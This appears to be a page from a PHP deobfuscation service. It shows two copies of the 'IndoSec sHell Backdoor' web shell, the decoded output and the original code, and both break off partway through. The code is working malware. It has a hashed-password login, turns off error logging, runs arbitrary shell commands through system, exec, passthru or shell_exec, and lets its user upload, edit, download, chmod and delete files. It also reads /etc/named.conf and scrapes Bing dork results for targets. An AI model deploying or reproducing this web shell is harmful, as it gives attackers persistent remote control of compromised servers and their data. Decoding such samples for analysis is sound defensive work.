Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php session_start(); error_reporting(0); @set_time_limit(0); @clearstatcache(); @in..

Decoded Output download

<?php 
session_start(); 
error_reporting(0); 
@set_time_limit(0); 
@clearstatcache(); 
@ini_set('error_log', null); 
@ini_set('log_errors', 0); 
@ini_set('max_execution_time', 0); 
@ini_set('output_buffering', 0); 
@ini_set('display_errors', 0); 
 
/* Configurasi */ 
$aupas = '880aa6d3c5b469ba0ec76ff8b8dad794'; // IndoSec 
$default_action = 'FilesMan'; 
$default_use_ajax = true; 
$default_charset = 'UTF-8'; 
date_default_timezone_set('Asia/Jakarta'); 
function login_shell() { 
    ?> 
<!DOCTYPE html> 
<html> 
    <head> 
        <meta name="viewport" content="widht=device-widht, initial-scale=1.0"/> 
        <meta name="theme-color" content="#343a40"/> 
        <meta name="author" content="Holiq"/> 
        <meta name="copyright" content="{ IndoSec }"/> 
        <title>{ IndoSec sHell }</title> 
        <link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/> 
        <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/> 
        <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/> 
    </head> 
    <body class="bg-dark text-center text-light"> 
        <div class="container text-center mt-3"> 
            <h1>{ INDOSEC }</h1> 
            <h5>sHell Backdoor</h5><hr/> 
            <p class="mt-3 font-weight-bold"><i class="fa fa-terminal"></i> Login Dulu Kontol</p> 
            <form method="post"> 
                <div class="form-group input-group"> 
                    <div class="input-group-prepend"> 
                        <div class="input-group-text"><i class="fa fa-user"></i></div> 
                    </div> 
                    <input type="password" name="pass" placeholder="User Id..." class="form-control"> 
                </div> 
                <input type="submit" class="btn btn-danger btn-block" class="form-control" value="Login"> 
            </form> 
        </div> 
        <a href="https://facebook.com/IndoSecOfficial" class="text-muted fixed-bottom mb-3">Copyright 2019 @ { IndoSec }</a> 
    </body> 
</html> 
<?php 
exit; 
} 
if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) { 
    if (isset($_POST['pass']) && (md5($_POST['pass']) == $aupas)) { 
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; 
    } else { 
        login_shell(); 
    } 
} 
/* 
    * Akhir Login 
    * 
    * Aksi Download 
*/ 
if (isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['aksi'] == 'download')) { 
    @ob_clean(); 
    $file = $_GET['file']; 
    header('Content-Description: File Transfer'); 
    header('Content-Type: application/octet-stream'); 
    header('Content-Disposition: attachment; filename="'.basename($file).'"'); 
    header('Expires: 0'); 
    header('Cache-Control: must-revalidate'); 
    header('Pragma: public'); 
    header('Content-Length: '.filesize($file)); 
    readfile($file); 
    exit; 
} 
function w($dir, $perm) { 
    if (!is_writable($dir)) { 
        return "<font color='red'>".$perm.'</font>'; 
    } else { 
        return "<font color='lime'>".$perm.'</font>'; 
    } 
} 
function r($dir, $perm) { 
    if (!is_readable($dir)) { 
        return '<font color=red>'.$perm.'</font>'; 
    } else { 
        return '<font color=lime>'.$perm.'</font>'; 
    } 
} 
 
function exe($cmd) { 
    if (function_exists('system')) { 
        @ob_start(); 
        @system($cmd); 
        $buff = @ob_get_contents(); 
        @ob_end_clean(); 
 
        return $buff; 
    } elseif (function_exists('exec')) { 
        @exec($cmd, $results); 
        $buff = ''; 
        foreach ($results as $result) { 
            $buff .= $result; 
        } 
 
        return $buff; 
    } elseif (function_exists('passthru')) { 
        @ob_start(); 
        @passthru($cmd); 
        $buff = @ob_get_contents(); 
        @ob_end_clean(); 
 
        return $buff; 
    } elseif (function_exists('shell_exec')) { 
        $buff = @shell_exec($cmd); 
 
        return $buff; 
    } 
} 
function perms($file) { 
    $perms = fileperms($file); 
    if (($perms & 0xC000) == 0xC000) { 
        // Socket 
        $info = 's'; 
    } elseif (($perms & 0xA000) == 0xA000) { 
        // Symbolic Link 
        $info = 'l'; 
    } elseif (($perms & 0x8000) == 0x8000) { 
        // Regular 
        $info = '-'; 
    } elseif (($perms & 0x6000) == 0x6000) { 
        // Block special 
        $info = 'b'; 
    } elseif (($perms & 0x4000) == 0x4000) { 
        // Directory 
        $info = 'd'; 
    } elseif (($perms & 0x2000) == 0x2000) { 
        // Character special 
        $info = 'c'; 
    } elseif (($perms & 0x1000) == 0x1000) { 
        // FIFO pipe 
        $info = 'p'; 
    } else { 
        // Unknown 
        $info = 'u'; 
    } 
    // Owner 
    $info .= (($perms & 0x0100) ? 'r' : '-'); 
    $info .= (($perms & 0x0080) ? 'w' : '-'); 
    $info .= (($perms & 0x0040) ? 
    (($perms & 0x0800) ? 's' : 'x') : 
    (($perms & 0x0800) ? 'S' : '-')); 
    // Group 
    $info .= (($perms & 0x0020) ? 'r' : '-'); 
    $info .= (($perms & 0x0010) ? 'w' : '-'); 
    $info .= (($perms & 0x0008) ? 
    (($perms & 0x0400) ? 's' : 'x') : 
    (($perms & 0x0400) ? 'S' : '-')); 
 
    // World 
    $info .= (($perms & 0x0004) ? 'r' : '-'); 
    $info .= (($perms & 0x0002) ? 'w' : '-'); 
    $info .= (($perms & 0x0001) ? 
    (($perms & 0x0200) ? 't' : 'x') : 
    (($perms & 0x0200) ? 'T' : '-')); 
 
    return $info; 
} 
 
if (isset($_GET['dir'])) { 
    $dir = $_GET['dir']; 
    chdir($dir); 
} else { 
    $dir = getcwd(); 
} 
 
$os = php_uname(); 
$ip = gethostbyname(gethostname()); 
$ver = phpversion(); 
$web = $_SERVER['HTTP_HOST']; 
$sof = $_SERVER['SERVER_SOFTWARE']; 
$dir = str_replace('\', '/', $dir); 
$scdir = explode('/', $dir); 
$mysql = (function_exists('mysqli_connect')) ? '<font color=green>ON</font>' : '<font color=red>OFF</font>'; 
$curl = (function_exists('curl_version')) ? '<font color=green>ON</font>' : '<font color=red>OFF</font>'; 
$mail = (function_exists('mail')) ? '<font color=green>ON</font>' : '<font color=red>OFF</font>'; 
$total = disk_total_space($dir); 
$free = disk_free_space($dir); 
$pers = (int) ($free / $total * 100); 
$ds = @ini_get('disable_functions'); 
$show_ds = (!empty($ds)) ? "<a href='?dir=$dir&aksi=disabfunc' class='ds'>$ds</a>" : "<a href='?dir=$dir&aksi=disabfunc'><font color=green>NONE</font></a>"; 
$imgfol = "<img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img>"; 
$imgfile = "<img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img>"; 
function formatSize($bytes) { 
    $types = ['B', 'KB', 'MB', 'GB', 'TB']; 
    for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++); 
 
    return round($bytes, 2).' '.$types[$i]; 
} 
function ambilKata($param, $kata1, $kata2) { 
    if (strpos($param, $kata1) === false) { 
        return false; 
    } 
    if (strpos($param, $kata2) === false) { 
        return false; 
    } 
    $start = strpos($param, $kata1) + strlen($kata1); 
    $end = strpos($param, $kata2, $start); 
    $return = substr($param, $start, $end - $start); 
 
    return $return; 
} 
$d0mains = @file('/etc/named.conf', false); 
if (!$d0mains) { 
    $dom = '<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>'; 
    $GLOBALS['need_to_update_header'] = 'true'; 
} else { 
    $count = 0; 
    foreach ($d0mains as $d0main) { 
        if (@strstr($d0main, 'zone')) { 
            preg_match_all('#zone "(.*)"#', $d0main, $domains); 
            flush(); 
            if (strlen(trim($domains[1][0])) > 2) { 
                flush(); 
                $count++; 
            } 
        } 
    } 
    $dom = "$count Domain"; 
} 
 
function getsource($url) { 
    $curl = curl_init($url); 
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); 
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); 
    $content = curl_exec($curl); 
    curl_close($curl); 
 
    return $content; 
} 
 
function bing($dork) { 
    $npage = 1; 
    $npages = 30000; 
    $allLinks = []; 
    $lll = []; 
    while ($npage <= $npages) { 
        $x = getsource('http://www.bing.com/search?q='.$dork.'&first='.$npage); 
        if ($x) { 
            preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink); 
            foreach ($findlink[1] as $fl) { 
                array_push($allLinks, $fl); 
            } 
            $npage = $npage + 10; 
            if (preg_match('(first='.$npage.'&amp)siU', $x, $linksuiv) == 0) { 
                break; 
            } 
        } else { 
            break; 
        } 
    } 
    $URLs = []; 
    foreach ($allLinks as $url) { 
        $exp = explode('/', $url); 
        $URLs[] = $exp[2]; 
    } 
    $array = array_filter($URLs); 
    $array = array_unique($array); 
    $sss = count(array_unique($array)); 
    foreach ($array as $domain) { 
        echo $domain."
"; 
    } 
} 
 
function iconFile($ext) { 
    if ($ext == 'php') { 
        $img = 'https://image.flaticon.com/icons/png/128/337/337947.png"'; 
    } elseif ($ext == 'html') { 
        $img = 'https://image.flaticon.com/icons/png/128/136/136528.png"'; 
    } elseif ($ext == 'css') { 
        $img = 'https://image.flaticon.com/icons/png/128/136/136527.png"'; 
    } elseif ($ext == 'png') { 
        $img = 'https://image.flaticon.com/icons/png/128/136/136523.png"'; 
    } elseif ($ext == 'jpg') { 
        $img = 'https://image.flaticon.com/icons/png/128/136/136524.png"'; 
    } elseif ($ext == 'jpeg') { 
        $img = 'http://i.imgur.com/e8mkvPf.png"'; 
    } elseif ($ext == 'zip') { 
        $img = 'https://image.flaticon.com/icons/png/128/136/136544.png"'; 
    } elseif ($ext == 'js') { 
        $img = 'https://image.flaticon.com/icons/png/128/1126/1126856.png'; 
    } elseif ($ext == 'ttf') { 
        $img = 'https://image.flaticon.com/icons/png/128/1126/1126892.png'; 
    } elseif ($ext == 'otf') { 
        $img = 'https://image.flaticon.com/icons/png/128/1126/1126891.png'; 
    } elseif ($ext == 'txt') { 
        $img = 'https://image.flaticon.com/icons/png/128/136/136538.png'; 
    } elseif ($ext == 'ico') { 
        $img = 'https://image.flaticon.com/icons/png/128/1126/1126873.png'; 
    } elseif ($ext == 'conf') { 
        $img = 'https://image.flaticon.com/icons/png/512/1573/1573301.png'; 
    } elseif ($ext == 'htaccess') { 
        $img = 'https://image.flaticon.com/icons/png/128/1720/1720444.png'; 
    } elseif ($ext == 'sh') { 
        $img = 'https://image.flaticon.com/icons/png/128/617/617535.png'; 
    } elseif ($ext == 'py') { 
        $img = 'https://image.flaticon.com/icons/png/128/180/180867.png'; 
    } elseif ($ext == 'indsc') { 
        $img = 'https://image.flaticon.com/icons/png/512/1265/1265511.png'; 
    } elseif ($ext == 'sql') { 
        $img = 'https://img.icons8.com/ultraviolet/2x/data-configuration.png'; 
    } elseif ($ext == 'pl') { 
        $img = 'http://i.imgur.com/PnmX8H9.png'; 
    } elseif ($ext == 'pdf') { 
        $img = 'https://image.flaticon.com/icons/png/128/136/136522.png'; 
    } elseif ($ext == 'mp4') { 
        $img = 'https://image.flaticon.com/icons/png/128/136/136545.png'; 
    } elseif ($ext == 'mp3') { 
        $img = 'https://image.flaticon.com/icons/png/128/136/136548.png'; 
    } elseif ($ext == 'git') { 
        $img = 'https://image.flaticon.com/icons/png/128/617/617509.png'; 
    } elseif ($ext == 'md') { 
        $img = 'https://image.flaticon.com/icons/png/128/617/617520.png'; 
    } else { 
        $img = 'http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png'; 
    } 
 
    return $img; 
} 
 
function swall($swa, $text, $dir) { 
    echo "<script>Swal.fire({ 
        title: '$swa', 
        text: '$text', 
        type: '$swa', 
    }).then((value) => {window.location='?dir=$dir';})</script>"; 
} 
function about() { 
    echo '<div class="card text-center bg-light about"> 
        <h4 class="card-header">{ IndoSec }</h4> 
        <div class="card-body"> 
            <center><div class="img"></div></center> 
            <p class="card-text">{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.</p> 
        </div> 
        <div class="card-footer"> 
            <small class="card-text text-muted">Copyright 2019 { IndoSec }</small> 
        </div> 
    </div><br/>'; 
    exit; 
} 
function aksiUpload($dir) { 
    echo '<form method="POST" enctype="multipart/form-data" name="uploader" id="uploader"> 
        <div class="card"> 
            <div class="card-body form-group"> 
                <p class="text-muted">//Multiple Upload</p> 
                <div class="custom-file"> 
                    <input type="file" name="file[]" multiple class="custom-file-input" id="customFile"> 
                    <label class="custom-file-label" for="customFile">Choose file</label> 
                </div> 
                <input type="submit" class="btn btn-sm btn-primary btn-block mt-4 p-2" name="upload" value="Upload"> 
            </div> 
        </div> 
    </form>'; 
    if (isset($_POST['upload'])) { 
        $jumlah = count($_FILES['file']['name']); 
        for ($i = 0; $i < $jumlah; $i++) { 
            $filename = $_FILES['file']['name'][$i]; 
            $up = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename); 
        } 
        if ($jumlah < 2) { 
            if ($up) { 
                $swa = 'success'; 
                $text = "Berhasil Upload $filename"; 
                swall($swa, $text, $dir); 
            } else { 
                $swa = 'error'; 
                $text = 'Gagal Upload File'; 
                swall($swa, $text, $dir); 
            } 
        } else { 
            $swa = 'success'; 
            $text = "Berhasil Upload $jumlah File"; 
            swall($swa, $text, $dir); 
        } 
    } 
} 
function chmodFile($dir, $file, $nfile) { 
    echo "<form method='POST'> 
        <h5>Chmod File : $nfile </h5> 
        <div class='form-group input-group'> 
            <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['file'])), -4)."'> 
            <input type='submit' class='btn btn-danger form-control' value='Chmod'> 
        </div> 
    </form>"; 
    if (isset($_POST['perm'])) { 
        if (@chmod($_GET['file'], $_POST['perm'])) { 
            echo '<font color="lime">Change Permission Berhasil</font><br/>'; 
        } else { 
            echo '<font color="white">Change Permission Gagal</font><br/>'; 
        } 
    } 
} 
function buatFile($dir, $imgfile) { 
    echo "<h4>$imgfile Buat File :</h4> 
    <form method='POST'> 
        <div class='input-group'> 
            <input type='text' class='form-control' name='nama_file[]' placeholder='Nama File...'> 
            <div class='input-group-prepend'> 
                <div class='input-group-text'><a id='add_input'><i class='fa fa-plus'></i></a></div> 
            </div> 
        </div><br/> 
        <div id='output'></div> 
        <textarea name='isi_file' class='form-control' rows='13' placeholder='Isi File...'></textarea><br/> 
        <input type='submit' class='btn btn-info btn-block' name='bikin' value='Buat'> 
    </form>"; 
    if (isset($_POST['bikin'])) { 
        $name = $_POST['nama_file']; 
        $isi_file = $_POST['isi_file']; 
        foreach ($name as $nama_file) { 
            $handle = @fopen("$nama_file", 'w'); 
            if ($isi_file) { 
                $buat = @fwrite($handle, $isi_file); 
            } else { 
                $buat = $handle; 
            } 
        } 
        if ($buat) { 
            $swa = 'success'; 
            $text = 'Berhasil Membuat File'; 
            swall($swa, $text, $dir); 
        } else { 
            $swa = 'error'; 
            $text = 'Gagal Membuat File'; 
            swall($swa, $text, $dir); 
        } 
    } 
} 
function view($dir, $file, $nfile, $imgfile) { 
    echo '[ <a class="active" href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ]  [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ]  [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ]  [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ] 
    <h5>'.$imgfile.' Lihat File : '.$nfile.'</h5>'; 
    $is_image = @getimagesize($file); 
    if (is_array($is_image)) { 
        $source = base64_encode(file_get_contents($file)); 
        echo '<p>Type: '.$is_image['mime'].' | Size: '.$is_image['0'].' x '.$is_image['1']."</p> 
        <img class='img-fluid' src='data:".$is_image['mime'].';base64,'.$source."' alt='$nfile'>"; 
    } else { 
        echo '<textarea rows="13" class="form-control" disabled="">'.htmlspecialchars(@file_get_contents($file)).'</textarea><br/>'; 
    } 
} 
function editFile($dir, $file, $nfile, $imgfile) { 
    echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ]  [ <a class="active" href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ]  [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ]  [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]'; 
    $is_image = @getimagesize($file); 
    echo "<form method='POST'> 
        <h5>$imgfile Edit File : $nfile</h5>"; 
        if (is_array($is_image)) { 
            echo '<h5>Tidak dapat mengedit gambar</h5>'; 
        } else { 
            echo "<textarea rows='13' class='form-control' name='isi'>".htmlspecialchars(@file_get_contents($file))."</textarea><br/> 
            <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Update</button>"; 
        } 
    echo '</form>'; 
    if (isset($_POST['edit_file'])) { 
        $updt = fopen("$file", 'w'); 
        $hasil = fwrite($updt, $_POST['isi']); 
        if ($hasil) { 
            $swa = 'success'; 
            $text = 'Berhasil Update File'; 
            swall($swa, $text, $dir); 
        } else { 
            $swa = 'error'; 
            $text = 'Gagal Update File'; 
            swall($swa, $text, $dir); 
        } 
    } 
} 
function renameFile($dir, $file, $nfile, $imgfile) { 
    echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ]  [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ]  [ <a class="active" href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ]  [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]'; 
    echo "<form method='POST'> 
        <h5>$imgfile Rename File : $nfile</h5> 
        <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' value='$nfile'><br/> 
        <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Rename</button> 
    </form>"; 
    if (isset($_POST['rename_file'])) { 
        $lama = $file; 
        $baru = $_POST['namanew']; 
        rename($baru, $lama); 
        if (file_exists($baru)) { 
            $swa = 'success'; 
            $text = "Nama $baru Telah Digunakan"; 
            swall($swa, $text, $dir); 
        } else { 
            if (rename($lama, $baru)) { 
                $swa = 'success'; 
                $text = "Berhasil Mengganti Nama Menjadi $baru"; 
                swall($swa, $text, $dir); 
            } else { 
                $swa = 'error'; 
                $text = 'Gagal Mengganti Nama'; 
                swall($swa, $text, $dir); 
            } 
        } 
    } 
} 
function hapusFile($dir, $file, $nfile) { 
    echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ]  [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ]  [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ]  [ <a class="active" href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]'; 
    echo "<div class='card card-body text-center text-dark mb-4'> 
        <p>Yakin Menghapus : $nfile</p> 
        <form method='POST'> 
            <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a> 
            <input type='submit' name='ya' class='btn btn-success btn-success btn-block' value='Ya'> 
        </form> 
    </div>"; 
    if ($_POST['ya']) { 
        if (unlink($file)) { 
            $swa = 'success'; 
            $text = 'Berhasil Menghapus File'; 
            swall($swa, $text, $dir); 
        } else { 
            $swa = 'error'; 
            $text = 'Gagal Menghapus File'; 
            swall($swa, $text, $dir); 
        } 
    } 
} 
function chmodFolder($dir, $ndir) { 
    echo "<form met ?>

Did this file decode correctly?

Original Code

<?php
session_start();
error_reporting(0);
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);

/* Configurasi */
$aupas = '880aa6d3c5b469ba0ec76ff8b8dad794'; // IndoSec
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'UTF-8';
date_default_timezone_set('Asia/Jakarta');
function login_shell() {
    ?>
<!DOCTYPE html>
<html>
    <head>
        <meta name="viewport" content="widht=device-widht, initial-scale=1.0"/>
        <meta name="theme-color" content="#343a40"/>
        <meta name="author" content="Holiq"/>
        <meta name="copyright" content="{ IndoSec }"/>
        <title>{ IndoSec sHell }</title>
        <link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/>
        <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
        <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/>
    </head>
    <body class="bg-dark text-center text-light">
        <div class="container text-center mt-3">
            <h1>{ INDOSEC }</h1>
            <h5>sHell Backdoor</h5><hr/>
            <p class="mt-3 font-weight-bold"><i class="fa fa-terminal"></i> Login Dulu Kontol</p>
            <form method="post">
                <div class="form-group input-group">
                    <div class="input-group-prepend">
                        <div class="input-group-text"><i class="fa fa-user"></i></div>
                    </div>
                    <input type="password" name="pass" placeholder="User Id..." class="form-control">
                </div>
                <input type="submit" class="btn btn-danger btn-block" class="form-control" value="Login">
            </form>
        </div>
        <a href="https://facebook.com/IndoSecOfficial" class="text-muted fixed-bottom mb-3">Copyright 2019 @ { IndoSec }</a>
    </body>
</html>
<?php
exit;
}
if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
    if (isset($_POST['pass']) && (md5($_POST['pass']) == $aupas)) {
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    } else {
        login_shell();
    }
}
/*
    * Akhir Login
    *
    * Aksi Download
*/
if (isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['aksi'] == 'download')) {
    @ob_clean();
    $file = $_GET['file'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: '.filesize($file));
    readfile($file);
    exit;
}
function w($dir, $perm) {
    if (!is_writable($dir)) {
        return "<font color='red'>".$perm.'</font>';
    } else {
        return "<font color='lime'>".$perm.'</font>';
    }
}
function r($dir, $perm) {
    if (!is_readable($dir)) {
        return '<font color=red>'.$perm.'</font>';
    } else {
        return '<font color=lime>'.$perm.'</font>';
    }
}

function exe($cmd) {
    if (function_exists('system')) {
        @ob_start();
        @system($cmd);
        $buff = @ob_get_contents();
        @ob_end_clean();

        return $buff;
    } elseif (function_exists('exec')) {
        @exec($cmd, $results);
        $buff = '';
        foreach ($results as $result) {
            $buff .= $result;
        }

        return $buff;
    } elseif (function_exists('passthru')) {
        @ob_start();
        @passthru($cmd);
        $buff = @ob_get_contents();
        @ob_end_clean();

        return $buff;
    } elseif (function_exists('shell_exec')) {
        $buff = @shell_exec($cmd);

        return $buff;
    }
}
function perms($file) {
    $perms = fileperms($file);
    if (($perms & 0xC000) == 0xC000) {
        // Socket
        $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) {
        // Symbolic Link
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        // Regular
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        // Block special
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        // Directory
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        // Character special
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        // FIFO pipe
        $info = 'p';
    } else {
        // Unknown
        $info = 'u';
    }
    // Owner
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ?
    (($perms & 0x0800) ? 's' : 'x') :
    (($perms & 0x0800) ? 'S' : '-'));
    // Group
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ?
    (($perms & 0x0400) ? 's' : 'x') :
    (($perms & 0x0400) ? 'S' : '-'));

    // World
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ?
    (($perms & 0x0200) ? 't' : 'x') :
    (($perms & 0x0200) ? 'T' : '-'));

    return $info;
}

if (isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    chdir($dir);
} else {
    $dir = getcwd();
}

$os = php_uname();
$ip = gethostbyname(gethostname());
$ver = phpversion();
$web = $_SERVER['HTTP_HOST'];
$sof = $_SERVER['SERVER_SOFTWARE'];
$dir = str_replace('\\', '/', $dir);
$scdir = explode('/', $dir);
$mysql = (function_exists('mysqli_connect')) ? '<font color=green>ON</font>' : '<font color=red>OFF</font>';
$curl = (function_exists('curl_version')) ? '<font color=green>ON</font>' : '<font color=red>OFF</font>';
$mail = (function_exists('mail')) ? '<font color=green>ON</font>' : '<font color=red>OFF</font>';
$total = disk_total_space($dir);
$free = disk_free_space($dir);
$pers = (int) ($free / $total * 100);
$ds = @ini_get('disable_functions');
$show_ds = (!empty($ds)) ? "<a href='?dir=$dir&aksi=disabfunc' class='ds'>$ds</a>" : "<a href='?dir=$dir&aksi=disabfunc'><font color=green>NONE</font></a>";
$imgfol = "<img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img>";
$imgfile = "<img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img>";
function formatSize($bytes) {
    $types = ['B', 'KB', 'MB', 'GB', 'TB'];
    for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++);

    return round($bytes, 2).' '.$types[$i];
}
function ambilKata($param, $kata1, $kata2) {
    if (strpos($param, $kata1) === false) {
        return false;
    }
    if (strpos($param, $kata2) === false) {
        return false;
    }
    $start = strpos($param, $kata1) + strlen($kata1);
    $end = strpos($param, $kata2, $start);
    $return = substr($param, $start, $end - $start);

    return $return;
}
$d0mains = @file('/etc/named.conf', false);
if (!$d0mains) {
    $dom = '<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>';
    $GLOBALS['need_to_update_header'] = 'true';
} else {
    $count = 0;
    foreach ($d0mains as $d0main) {
        if (@strstr($d0main, 'zone')) {
            preg_match_all('#zone "(.*)"#', $d0main, $domains);
            flush();
            if (strlen(trim($domains[1][0])) > 2) {
                flush();
                $count++;
            }
        }
    }
    $dom = "$count Domain";
}

function getsource($url) {
    $curl = curl_init($url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    $content = curl_exec($curl);
    curl_close($curl);

    return $content;
}

function bing($dork) {
    $npage = 1;
    $npages = 30000;
    $allLinks = [];
    $lll = [];
    while ($npage <= $npages) {
        $x = getsource('http://www.bing.com/search?q='.$dork.'&first='.$npage);
        if ($x) {
            preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
            foreach ($findlink[1] as $fl) {
                array_push($allLinks, $fl);
            }
            $npage = $npage + 10;
            if (preg_match('(first='.$npage.'&amp)siU', $x, $linksuiv) == 0) {
                break;
            }
        } else {
            break;
        }
    }
    $URLs = [];
    foreach ($allLinks as $url) {
        $exp = explode('/', $url);
        $URLs[] = $exp[2];
    }
    $array = array_filter($URLs);
    $array = array_unique($array);
    $sss = count(array_unique($array));
    foreach ($array as $domain) {
        echo $domain."\n";
    }
}

function iconFile($ext) {
    if ($ext == 'php') {
        $img = 'https://image.flaticon.com/icons/png/128/337/337947.png"';
    } elseif ($ext == 'html') {
        $img = 'https://image.flaticon.com/icons/png/128/136/136528.png"';
    } elseif ($ext == 'css') {
        $img = 'https://image.flaticon.com/icons/png/128/136/136527.png"';
    } elseif ($ext == 'png') {
        $img = 'https://image.flaticon.com/icons/png/128/136/136523.png"';
    } elseif ($ext == 'jpg') {
        $img = 'https://image.flaticon.com/icons/png/128/136/136524.png"';
    } elseif ($ext == 'jpeg') {
        $img = 'http://i.imgur.com/e8mkvPf.png"';
    } elseif ($ext == 'zip') {
        $img = 'https://image.flaticon.com/icons/png/128/136/136544.png"';
    } elseif ($ext == 'js') {
        $img = 'https://image.flaticon.com/icons/png/128/1126/1126856.png';
    } elseif ($ext == 'ttf') {
        $img = 'https://image.flaticon.com/icons/png/128/1126/1126892.png';
    } elseif ($ext == 'otf') {
        $img = 'https://image.flaticon.com/icons/png/128/1126/1126891.png';
    } elseif ($ext == 'txt') {
        $img = 'https://image.flaticon.com/icons/png/128/136/136538.png';
    } elseif ($ext == 'ico') {
        $img = 'https://image.flaticon.com/icons/png/128/1126/1126873.png';
    } elseif ($ext == 'conf') {
        $img = 'https://image.flaticon.com/icons/png/512/1573/1573301.png';
    } elseif ($ext == 'htaccess') {
        $img = 'https://image.flaticon.com/icons/png/128/1720/1720444.png';
    } elseif ($ext == 'sh') {
        $img = 'https://image.flaticon.com/icons/png/128/617/617535.png';
    } elseif ($ext == 'py') {
        $img = 'https://image.flaticon.com/icons/png/128/180/180867.png';
    } elseif ($ext == 'indsc') {
        $img = 'https://image.flaticon.com/icons/png/512/1265/1265511.png';
    } elseif ($ext == 'sql') {
        $img = 'https://img.icons8.com/ultraviolet/2x/data-configuration.png';
    } elseif ($ext == 'pl') {
        $img = 'http://i.imgur.com/PnmX8H9.png';
    } elseif ($ext == 'pdf') {
        $img = 'https://image.flaticon.com/icons/png/128/136/136522.png';
    } elseif ($ext == 'mp4') {
        $img = 'https://image.flaticon.com/icons/png/128/136/136545.png';
    } elseif ($ext == 'mp3') {
        $img = 'https://image.flaticon.com/icons/png/128/136/136548.png';
    } elseif ($ext == 'git') {
        $img = 'https://image.flaticon.com/icons/png/128/617/617509.png';
    } elseif ($ext == 'md') {
